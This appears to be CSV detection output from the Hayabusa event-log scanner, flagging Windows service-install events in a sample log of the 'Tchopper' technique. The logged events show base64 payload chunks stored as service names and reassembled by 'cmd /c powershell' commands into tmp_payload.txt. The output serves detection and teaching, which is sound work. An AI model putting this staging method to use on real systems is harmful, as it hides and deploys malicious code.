2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c 
powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append 